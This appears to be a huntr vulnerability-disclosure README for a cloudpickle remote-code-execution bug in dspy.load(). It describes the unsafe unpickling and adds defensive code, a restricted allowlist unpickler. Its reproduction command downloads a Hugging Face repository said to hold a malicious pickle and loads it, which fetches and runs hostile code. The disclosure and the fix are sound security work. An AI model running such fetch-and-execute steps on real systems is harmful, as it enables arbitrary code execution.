DSPy cloudpickle.load() RCE PoC

Security research PoC for huntr submission.

Vulnerability: dspy.load() in dspy/utils/saving.py:23 reads program.pkl with cloudpickle.load(), which is an unrestricted pickle.load(). There is no weights_only-style restriction and no allowlist of importable globals, so any __reduce__-based payload stored in program.pkl executes at load time.

Affected version: dspy-ai 2.6.27 (latest)

Reproduction

pip install dspy-ai
python3 -c "
import dspy
from huggingface_hub import snapshot_download
path = snapshot_download('th3-j0k3r/dspy-cloudpickle-poc')
dspy.load(path)
print(open('/tmp/dspy_rce_hf.txt').read())
"
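For the defending side, the fix for this class of bug is to stop resolving arbitrary globals during unpickling. The following is an added example, not code from dspy or from the PoC author: a restricted unpickler that only honours an allowlist of (module, name) pairs, which is an assumed list here and would have to be filled in from what dspy actually serialises. It rejects a disallowed global before the corresponding REDUCE can run anything.

```python
import collections
import io
import pickle

# Allowlist of (module, name) pairs a saved program may reference. This is an
# assumption for the example; a real deployment would enumerate the exact
# classes dspy serialises into program.pkl.
ALLOWED_GLOBALS = {
    ("builtins", "dict"),
    ("builtins", "list"),
    ("builtins", "set"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves globals only from ALLOWED_GLOBALS.

    pickle resolves every GLOBAL/STACK_GLOBAL opcode through find_class before
    a later REDUCE opcode can call it, so raising here stops a __reduce__-based
    payload before any callable runs.
    """

    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(
                f"refusing to resolve global {module}.{name}")
        return super().find_class(module, name)


def safe_load(data: bytes):
    """Restricted replacement for cloudpickle.load() on the file's bytes."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_load(data: bytes):
    """Return ('ok', obj) or ('blocked', reason) instead of raising."""
    try:
        return ("ok", safe_load(data))
    except pickle.UnpicklingError as exc:
        return ("blocked", str(exc))


# Constructed sample inputs: a plain dict standing in for benign program state,
# and an object whose unpickling needs a global outside the allowlist.
BENIGN = pickle.dumps({"signature": "question -> answer", "demos": []})
DISALLOWED = pickle.dumps(collections.OrderedDict(a=1))

if __name__ == "__main__":
    print(try_load(BENIGN))      # ('ok', {...})
    print(try_load(DISALLOWED))  # ('blocked', 'refusing to resolve global collections.OrderedDict')
```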